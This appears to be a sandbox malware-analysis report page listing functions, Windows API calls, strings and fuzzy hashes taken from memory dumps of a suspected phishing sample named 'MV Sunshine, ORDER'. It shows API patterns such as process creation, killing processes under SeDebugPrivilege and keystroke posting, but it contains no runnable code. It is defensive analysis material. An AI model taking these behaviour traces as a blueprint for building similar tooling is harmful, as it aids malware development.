Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 7d44cd9b85bef67bb811605527b951b9418af3053c8e76ed40bb7aa3833f0fd1
Instruction ID: 8989b753958da3482407ab718a2b58cd839fb71d41f4cb77f7d6779e6b65e733
Opcode Fuzzy Hash: 7d44cd9b85bef67bb811605527b951b9418af3053c8e76ed40bb7aa3833f0fd1
Instruction Fuzzy Hash: 92F11971A00109EFDB14DF94C888EBEB7B9FF89314F148459FA15AB250DB71AE46CB50

Function 009FF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009FF9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009FFB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009FFB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009FFBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009FFBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009FFD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009FFD90
CloseHandle.KERNEL32(?), ref: 009FFDBF
CloseHandle.KERNEL32(?), ref: 009FFE36

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: d0099d6c7b02d4eaa71b456397f2e47651158aee70e3db3ec74f76b6383a42c4
Instruction ID: 94b9a6b31d310d0186cc426a0cb7f3ae0451c29c31b623931909574e3a6e1e08
Opcode Fuzzy Hash: d0099d6c7b02d4eaa71b456397f2e47651158aee70e3db3ec74f76b6383a42c4
Instruction Fuzzy Hash: B0E1B2312043459FCB14EF24C891B7ABBE4AF85354F18886DF9999B3A2DB31DC45CB52

Function 009E4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 009E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009E38D3,?), ref: 009E48C7

Part of subcall function 009E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009E38D3,?), ref: 009E48E0

Part of subcall function 009E4CD3: GetFileAttributesW.KERNEL32(?,009E3947), ref: 009E4CD4

lstrcmpiW.KERNEL32(?,?), ref: 009E4FE2
_wcscmp.LIBCMT ref: 009E4FFC
MoveFileW.KERNEL32(?,?), ref: 009E5017

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 0fbba9145169c45451ce6793ef91e99a94c2ba96288eecf335f7a9ccd91b0e5b
Instruction ID: 34cad76afba368c6839e5f134053bd93572708c4905d16b37a50bd24aea013b1
Opcode Fuzzy Hash: 0fbba9145169c45451ce6793ef91e99a94c2ba96288eecf335f7a9ccd91b0e5b
Instruction Fuzzy Hash: 075163B20087859BC725EBA1C881ADFB3ECAFC5341F10492EF189D3151EF74E6898766

Function 00A088B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A0896E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: d356a63c36d3cb25691d03f38ba0e5470beb0071abddbf52c3d65c98b206a2b0
Instruction ID: 40e000b20469fc32d8b8d6cb574887be3ddc12f75227dbf4085aed08e53cbcce
Opcode Fuzzy Hash: d356a63c36d3cb25691d03f38ba0e5470beb0071abddbf52c3d65c98b206a2b0
Instruction Fuzzy Hash: 4F51D63060030CBFDF30DF28EC85BA93BA4BB15390F604112F591E66E1DF79A9848B89

Function 00982B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 009BC547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009BC569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009BC581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 009BC59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009BC5C0
DestroyIcon.USER32(00000000), ref: 009BC5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009BC5EC
DestroyIcon.USER32(?), ref: 009BC5FB

Part of subcall function 00A0A71E: DeleteObject.GDI32(00000000), ref: 00A0A757

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 0d2b40b00bd292da5b160308c2d18d9171a09b7828ab13c1a2cc35eaf4e6e5d9
Instruction ID: 4285b4b83a080a2140bb61d9bf349cf8cd4cf19cf04b76e5589694d08b057297
Opcode Fuzzy Hash: 0d2b40b00bd292da5b160308c2d18d9171a09b7828ab13c1a2cc35eaf4e6e5d9
Instruction Fuzzy Hash: C5518BB4A00209AFDB20EF64CC45FAA37B9EB55720F104528F902E76A0DBB5ED81DB50

Function 009D9B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 009DAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 009DAE77
Part of subcall function 009DAE57: GetCurrentThreadId.KERNEL32 ref: 009DAE7E
Part of subcall function 009DAE57: AttachThreadInput.USER32(00000000,?,009D9B65,?,00000001), ref: 009DAE85

MapVirtualKeyW.USER32(00000025,00000000), ref: 009D9B70
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009D9B8D
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 009D9B90
MapVirtualKeyW.USER32(00000025,00000000), ref: 009D9B99
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009D9BB7
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009D9BBA
MapVirtualKeyW.USER32(00000025,00000000), ref: 009D9BC3
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009D9BDA
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009D9BDD

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 1501b42a515079e8ca06caac44f2ca33d5dd529b98c9e07a4faf544bbc90f45b
Instruction ID: c7bb53dc78f182ceeb00df1e782c11e8c5b3383f1c05422a464d3876bf6e7a46
Opcode Fuzzy Hash: 1501b42a515079e8ca06caac44f2ca33d5dd529b98c9e07a4faf544bbc90f45b
Instruction Fuzzy Hash: 5A11E171550618BFF620ABA0DC89F6A3B2DEB4C751F110426F344BB5A0CAF35C12DAB4

Function 009D8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,009D8A84,00000B00,?,?), ref: 009D8E0C
HeapAlloc.KERNEL32(00000000,?,009D8A84,00000B00,?,?), ref: 009D8E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009D8A84,00000B00,?,?), ref: 009D8E28
GetCurrentProcess.KERNEL32(?,00000000,?,009D8A84,00000B00,?,?), ref: 009D8E30
DuplicateHandle.KERNEL32(00000000,?,009D8A84,00000B00,?,?), ref: 009D8E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,009D8A84,00000B00,?,?), ref: 009D8E43
GetCurrentProcess.KERNEL32(009D8A84,00000000,?,009D8A84,00000B00,?,?), ref: 009D8E4B
DuplicateHandle.KERNEL32(00000000,?,009D8A84,00000B00,?,?), ref: 009D8E4E
CreateThread.KERNEL32(00000000,00000000,009D8E74,00000000,00000000,00000000), ref: 009D8E68

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 9670acab613d3641e1e3bfd3cb6d380f6aefa098363b097c9a013d515002f56a
Instruction ID: df2a86cecc2619c5caad7205be5426eb77ea331dd3a8f610fbe943a37593c26a
Opcode Fuzzy Hash: 9670acab613d3641e1e3bfd3cb6d380f6aefa098363b097c9a013d515002f56a
Instruction Fuzzy Hash: A501AC75240308FFE620EBA5DC4DF573B6CEB89711F004521FB05DB591CA7098028A20

Function 009F9428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009F947C
VariantInit.OLEAUT32(?), ref: 009F954D
VariantInit.OLEAUT32(?), ref: 009F964E
VariantClear.OLEAUT32(?), ref: 009F9658
VariantClear.OLEAUT32(?), ref: 009F96B5

Strings

Null Object assignment in FOR..IN loop, xrefs: 009F94DD, 009F960B, 009F96C3
Incorrect Object type in FOR..IN loop, xrefs: 009F9631

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: e877e5ce67b002e7bfcd8ee679a6cd42017d3115b3e6035d7ad11c50c11de97d
Instruction ID: 56eff546e5e8bce545ba09ae5062a77d2ecfdc133890f8af51d463e9bc7361c1
Opcode Fuzzy Hash: e877e5ce67b002e7bfcd8ee679a6cd42017d3115b3e6035d7ad11c50c11de97d
Instruction Fuzzy Hash: 6C91BF71A00219AFDF24DFA5C888FAEB7B8EF85710F108559FA15EB290D7709945CFA0

Function 009F9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 009D7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?,?,?,009D799D), ref: 009D766F
Part of subcall function 009D7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?,?), ref: 009D768A
Part of subcall function 009D7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?,?), ref: 009D7698
Part of subcall function 009D7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?), ref: 009D76A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 009F9B1B
_memset.LIBCMT ref: 009F9B28
_memset.LIBCMT ref: 009F9C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 009F9C97
CoTaskMemFree.OLE32(?), ref: 009F9CA2

Strings

NULL Pointer assignment, xrefs: 009F9CF0

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: a48f3634900b98b6f5b0d25046f1c1299468b4b0fa92555fe2242cac97f9a181
Instruction ID: d2199b6c412da47f36cc01222b11bd4cce88a3a7b23dac0a27fc9489f8226c26
Opcode Fuzzy Hash: a48f3634900b98b6f5b0d25046f1c1299468b4b0fa92555fe2242cac97f9a181
Instruction Fuzzy Hash: FB913971D0021DABDB10DFA5DC84FEEBBB8AF48710F20815AF519A7291DB319A45CFA0

Function 00A06FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A07093
SendMessageW.USER32(?,00001036,00000000,?), ref: 00A070A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A070C1
_wcscat.LIBCMT ref: 00A0711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 00A07133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A07161

Strings

SysListView32, xrefs: 00A07065

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 450073bd14984a43f6f4682c48a54c16d9015bff9e2fa1a06f2c75dc13b6babb
Instruction ID: 98db734a45761bdf5053a83a018f7e32db2c9a3b9c55c97c99e2d152e4900d4e
Opcode Fuzzy Hash: 450073bd14984a43f6f4682c48a54c16d9015bff9e2fa1a06f2c75dc13b6babb
Instruction Fuzzy Hash: 40419071A0430CAFEB21DFA4DC85BEE77A8EF48350F10052AF584A72D1D772AD858B60

Function 009FEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 009E3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 009E3EB6
Part of subcall function 009E3E91: Process32FirstW.KERNEL32(00000000,?), ref: 009E3EC4
Part of subcall function 009E3E91: CloseHandle.KERNEL32(00000000), ref: 009E3F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 009FECB8
GetLastError.KERNEL32 ref: 009FECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 009FECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 009FED77
GetLastError.KERNEL32(00000000), ref: 009FED82
CloseHandle.KERNEL32(00000000), ref: 009FEDB7

Strings

SeDebugPrivilege, xrefs: 009FECD6

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: fbe4d5cc1fe9823fdb833d5d68b8dfb983d252915e602cc1689b55537d2d5714
Instruction ID: 368c11cbc40179a19f2f2c27ced1ff036a7e6bb6579b71d65426d82a6c832a02
Opcode Fuzzy Hash: fbe4d5cc1fe9823fdb833d5d68b8dfb983d252915e602cc1689b55537d2d5714
Instruction Fuzzy Hash: 7D41AB712002049FDB25EF64CC95F7EB7A5AF80714F088459FA42AF3D2DB75A805CB96

Function 009E3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 009E32C5

Strings

blank, xrefs: 009E3247
warning, xrefs: 009E32AE
info, xrefs: 009E3266
question, xrefs: 009E327E
stop, xrefs: 009E3296

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 6e6236779bdbcdc372aee7c9a189bf32a332230df444877158533d253044a3a8
Instruction ID: 54baa504469688cccc9af4422bc7e2e15b9f829a5c106e5d0ac03e4c05483a05
Opcode Fuzzy Hash: 6e6236779bdbcdc372aee7c9a189bf32a332230df444877158533d253044a3a8
Instruction Fuzzy Hash: E6115B3160C3D67AD7035A56DC46DABB39CEF19370F10842AFA5067381E6659F0045E5

Function 009E4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009E454E
LoadStringW.USER32(00000000), ref: 009E4555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009E456B
LoadStringW.USER32(00000000), ref: 009E4572
_wprintf.LIBCMT ref: 009E4598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 009E45B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 009E4593

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 10191dbb0f1ba3f8e8da64266b50bd1dffb2629527198484bdbd1e872e096d90
Instruction ID: 15242334add85e9e40155f2cab4461f8d33762846bbd4b424e71261a4a47d32e
Opcode Fuzzy Hash: 10191dbb0f1ba3f8e8da64266b50bd1dffb2629527198484bdbd1e872e096d90
Instruction Fuzzy Hash: E90162F290024CBFE721E7E0DD89EE7776CE708301F0005A5BB49E2051EA759E868B70

Function 00A0D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

GetSystemMetrics.USER32(0000000F), ref: 00A0D78A
GetSystemMetrics.USER32(0000000F), ref: 00A0D7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00A0D9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A0DA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A0DA24
ShowWindow.USER32(00000003,00000000), ref: 00A0DA43
InvalidateRect.USER32(?,00000000,00000001), ref: 00A0DA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 00A0DA8B

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 61b62ced3799b557559513828d02a894da2b25ec0a650062e892b4df13665e35
Instruction ID: 05d4593aa9eb002e046c8152943d3025f834fe5212701600b36011a24b517a06
Opcode Fuzzy Hash: 61b62ced3799b557559513828d02a894da2b25ec0a650062e892b4df13665e35
Instruction Fuzzy Hash: C3B19836600229EFDF14CFA8D9C57BE7BB1BF44741F088069EC48AB695D731A951CB90

Function 00982A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,009BC417,00000004,00000000,00000000,00000000), ref: 00982ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,009BC417,00000004,00000000,00000000,00000000,000000FF), ref: 00982B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,009BC417,00000004,00000000,00000000,00000000), ref: 009BC46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,009BC417,00000004,00000000,00000000,00000000), ref: 009BC4D6

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: fe6fd42a3b864da4f5544398693e973c8c13d33ac5d037e90bcfa6e2027d32bd
Instruction ID: e8abed6b376d7b5c24daca0e23259243adea379daa82a892f731daab410fabff
Opcode Fuzzy Hash: fe6fd42a3b864da4f5544398693e973c8c13d33ac5d037e90bcfa6e2027d32bd
Instruction Fuzzy Hash: 5A412B75208680AEC73DEB68DD987BB7B9AAF86310F14881DE0579A7F0C639D842D711

Function 009E7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 009E737F

Part of subcall function 009A0FF6: std::exception::exception.LIBCMT ref: 009A102C
Part of subcall function 009A0FF6: __CxxThrowException@8.LIBCMT ref: 009A1041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009E73B6
EnterCriticalSection.KERNEL32(?), ref: 009E73D2
_memmove.LIBCMT ref: 009E7420
_memmove.LIBCMT ref: 009E743D
LeaveCriticalSection.KERNEL32(?), ref: 009E744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009E7461
InterlockedExchange.KERNEL32(?,000001F6), ref: 009E7480

